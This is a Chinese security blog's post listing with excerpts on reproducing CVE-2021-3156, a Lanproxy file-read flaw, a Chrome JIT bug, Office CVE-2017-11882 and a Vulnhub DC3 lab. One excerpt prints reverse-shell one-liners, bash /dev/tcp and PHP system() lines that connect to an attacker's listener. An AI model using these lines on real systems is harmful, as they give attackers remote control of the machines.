- 博客(6)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 CVE-2021-3156 sudo命令提权漏洞复现
CVE-2021-3156 漏洞复现0x00漏洞描述这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的
2021-05-25 18:07:49
347
原创 Lanproxy 任意文件读取漏洞复现
漏洞名称Lanproxy 任意文件读取漏洞复现漏洞编号CVE-2021-3019漏洞描述Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过…/绕过读取任意文件。该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据影响版本la..
2021-05-25 18:05:43
290
原创 2021护网期间Chrome远程代码执行0Day复现(CVE-2021-21220)
这个漏洞算是护网期间比较出名的一个,蛮多人知道的,据我护网结束回来差不多也一个月了,得空复现一下漏洞分析漏洞存在于 Chrome 的 JS 引擎的 JIT 编译器 Turbofan 当中,Instruction Selector阶段在处理ChangeInt32ToInt64节点时,会先检查 node 的 input 节点,如果 input 节点的操作码是 Load,那么会根据该 input节点的 LoadRepresentation 和 MachineRepresentation进行一些特殊的处理,
2021-05-24 13:29:42
2011
1
原创 CVE-2017-11882 通杀所有office版本
office算是生活工作用的比较多的工具了,最近发现哪怕17年爆出了CVE-2017-11882这个漏洞,许多人也没有进行重视或是修复,甚至完全不知情,就我身边的朋友,基本一抓一个准,此漏洞影响还是蛮广的,大部分office版本都存在漏洞概述此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个off
2021-05-24 13:19:38
466
1
原创 整理一些最近用到的反弹shell脚本,用的时候可以拿,不用去找了
1.命令执行拼接echo "bash -i >& /dev/tcp/10.181.12.208/5555 0>&1" | bashKali监听就完了2.python脚本,下载执行3.php反弹shell语句,可以用这个<?php system("bash ‐c 'bash ‐i >& /dev/tcp/ip/端口0>&1'"); ?> 执行后nc监听一下端口或者这个<?php system('rm /tmp..
2021-04-29 15:47:15
196
原创 4.29练习【Vulnhub靶机系列】DC3
探测主机IP探测开放端口,nmap -A简单扫一下详细信息框架好像是用的joomla,一会可以用这个框架的专用扫描器扫扫进它的首页看看先不管这么多,我们已经找到登入点了,之前我们用nmap扫出此网站用的框架是joomla用专门扫它的工具试试安装joomscan工具的命令是sudo apt-get install joomscan装完开扫Sqlmap-u"http://192.168.191.1...
2021-04-29 02:11:47
345
ubuntu16-39772.zip-exp-master.zip
2021-04-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人